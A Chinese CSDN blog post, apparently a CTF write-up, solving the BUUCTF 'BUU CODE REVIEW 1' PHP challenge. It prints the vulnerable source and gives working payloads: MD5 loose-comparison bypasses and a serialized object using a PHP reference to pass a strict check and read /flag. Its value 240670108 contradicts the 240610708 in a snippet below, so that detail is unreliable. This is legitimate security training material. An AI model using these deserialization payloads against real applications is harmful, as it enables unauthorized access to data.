BUU CODE REVIEW 1

最新推荐文章于 2024-08-24 12:43:50 发布
最新推荐文章于 2024-08-24 12:43:50 发布
阅读量3.1k 收藏 3
点赞数
分类专栏: 刷题记录 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Little_jcak/article/details/124233712
版权
本文探讨了PHP中的引用特性,如何利用它进行弱比较和序列化绕过,以及在破坏对象销毁时的安全风险。示例代码展示了如何通过传引用使变量值相等以满足特定条件,同时提到了MD5弱比较的绕过方法,如使用数组或0e特性。文章还包含了防止这类攻击的安全实践。
摘要由CSDN通过智能技术生成

写在前面:这道题传引用的知识点,让我意识到php机制的一些不同,php有着自己的语言特性
一篇详细介绍php引用特性的文章

<?php

highlight_file(__FILE__);

class BUU {
   public $correct = "";
   public $input = "";

   public function __destruct() {
       try {
           $this->correct = base64_encode(uniqid());
           if($this->correct === $this->input) {
               echo file_get_contents("/flag");
           }
       } catch (Exception $e) {
       }
   }
}

if($_GET['pleaseget'] === '1') {
    if($_POST['pleasepost'] === '2') {
        if(md5($_POST['md51']) == md5($_POST['md52']) && $_POST['md51'] != $_POST['md52']) {
            unserialize($_POST['obj']);
        }
    }
}
  • md5绕过
    可以看出是弱比较,通过数组绕过,或者0e性质绕过
md51[]=1&&md52[]=2

md51=QNKCDZO&&md52=240670108
  • 传引用绕过
    在进入destruct函数之前,通过传引用让两个值相等,从而满足强比较的条件
<?php
class BUU {
   public $correct;
   public $input;
}
$a = new BUU();
$a->input = &$a->correct;
echo serialize($a);

example.php 给出一个传引用的例子,可以看到$b 的值与$a的值相等,随着$a的改变而改变
在这里插入图片描述
poc.php

<?php
echo serialize($profile);
class BUU {
   public $correct='';
   public $input='';
}
$a = new BUU();
$a->input = &$a->correct;
echo serialize($a);
?>

在这里插入图片描述

Y3pro
关注
专栏目录
BUU 论坛的编辑器163Editor
09-21
1. **result.asp**:这可能是一个ASP(Active Server Pages)脚本文件,通常用于服务器端处理用户请求。在编辑器的上下文中,它可能是用来处理用户通过编辑器提交的富文本内容,例如进行数据格式转换或存储到数据库...
BUUCTF】basic web BUU CODE REVIEW 1 1(反序列化漏洞,传引用判断相等)
weixin_45844670的博客
10-12 3349
<?php /** * Created by PhpStorm. * User: jinzhao * Date: 2019/10/6 * Time: 8:04 PM */ highlight_file(__FILE__); class BUU { public $correct = ""; public $input = ""; public function __destruct() { try { $this->corre
【CTF练习】BUU CODE REVIEW 1(代码审计)
m0_73866435的博客
01-31 1648
大致流程第一个if满足进入的条件为第二个if满足条件为。第三个if满足条件为。如果 1、2、3 条件都满足之后就会执行反序列化,通过POST 传参obj 执行,然后进入类函数类函数也有一个if满足条件为。但是correct 却是利用一个时间进行计算的值的base64 值。那么为什么执行反序列化就会自动进行类函数执行呢,我们来了解一下魔术方法。
CTF-PHP反序列化漏洞4-实例理解POP链(经典赛题)
Eason_LYC安全白帽子的成长博客
05-08 2585
悲观者预言失败,十言九中。乐观者创造奇迹,一次即可。一个人的价值,在于他所拥有的。可以不学无术,但不能一无所有!关注WEB安全、网络攻防。我的专栏文章知识点全面细致,逻辑清晰、结合实战,让你在学习路上事半功倍,少走弯路!追求技术至上,这是我们理想中的极乐世界~(关注我即可加入社区)本专栏打破以往CTF速成或就题论题模式。采用。让刚接触CTF的读者真正掌握CTF中各类型知识点,为后续自学或快速刷题备赛,打下坚实的基础~
BUUCTF/BUU CODE REVIEW 1
weixin_44041994的博客
03-20 897
2.判断GET参数pleaseget的值是否为1,POST参数pleasepost的值是否为2,参数md51和md52的值是否不等,经过md5加密后的参数md51和md52的值是否相等,这四个条件同时满足的话,对POST参数obj进行反序列化,而对象被反序列化时会调用__destruct方法。序列化的定义是:在计算机科学的数据处理中,是指将数据结构或对象状态转换成可取用格式(例如存成文件,存于缓冲,或经由网络中发送)以留待后续在相同或另一台计算机环境中,能恢复原先状态的过程。最后是进行反序列化的obj。
POSN:POSN-BUU的源代码
04-01
1. **面向对象编程**:C++支持面向对象编程(OOP),这可能意味着代码中包含多个类,每个类代表了系统中的一个实体或功能,如定位器、传感器、数据处理器等。类之间可能存在继承、封装和多态性等特性。 2. **模板和...
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主题包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影...
BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)
05-26
在"BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)"这个挑战中,参赛者需要对名为"easywasm.wasm"的WASM文件进行逆向工程,理解其内部逻辑并可能找到隐藏的漏洞或解决方案。 WASM的主要特点包括: 1...
反序列号漏洞学习!BUUCTF 极客PHP BUU CODE REVIEW 1 [网鼎杯 2020 青龙组]AreUSerialz
qq_58869808的博客
07-26 1672
反序列号漏洞学习!BUUCTF 极客PHP BUU CODE REVIEW 1 [网鼎杯 2020 青龙组]AreUSerialz
BUUCTF basic BUU CODE REVIEW 1&sqli-labs &BUU UPLOAD COURSE 1
网安小趴菜
08-26 1114
BUUCTF basic BUU CODE REVIEW 1&sqli-labs&BUU UPLOAD COURSE 1 wp
CTF-反序列化
qq_61774705的博客
08-15 4523
反序列化
BUUCTF刷题笔记—CODE REVIEW 1(使用Hacker google/Edge扩展器)
最新发布
qq_43176656的博客
08-24 639
BUUCTF CODE REVIEW Hacker
BUU CODE REVIEW 1 1
shinygod的博客
03-30 1957
知识点:地址传值 法1: GET:?pleaseget=1 POST:pleasepost=2&md51=QNKCDZO&md52=240610708&obj=O:3:"BUU":2:{s:7:"correct";s:0:"";s:5:"input";R:2;} 原理:QNKCDZO和240610708MD5一下为0e开头,又是弱等于,0的n次方还是0 法2: GET:?pleaseget=1 POST:pleasepost=2&md51[]=1&md52[
常见的MD5碰撞
aeymp589524的博客
10-31 416
md5值为0e开头 0e开头的md5和原值: QNKCDZO 0e830400451993494058024219903391 s878926199a 0e545993274517709034328855841020 s155964671a 0e342768416822451524974117254469 s214587387a 0e848240448830537924465865611...
BUU CODE REVIEW 11 代码审计之反序列化知识
weixin_42515203的博客
06-19 573
BUU CODE REVIEW 11 代码审计之反序列化知识
BUU CODE REVIEW
m2a3181的博客
07-20 398
BUU CODE REVIEW 题目是简单的代码审计 <?php /** * Created by PhpStorm. * User: jinzhao * Date: 2019/10/6 * Time: 8:04 PM */ highlight_file(__FILE__); class BUU { public $correct = ""; public $input = ""; public function __destruct() { try
BUU BRUTE 1 1
09-18
BUU BRUTE 1是一个爆破任务,根据引用所述,首先尝试爆破用户名,可以选择一个适合的字典进行爆破。接着,根据引用所述,可以切换到密码爆破模式,使用适当的字典或数字列表进行爆破。最后,根据引用所述,通过查看...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值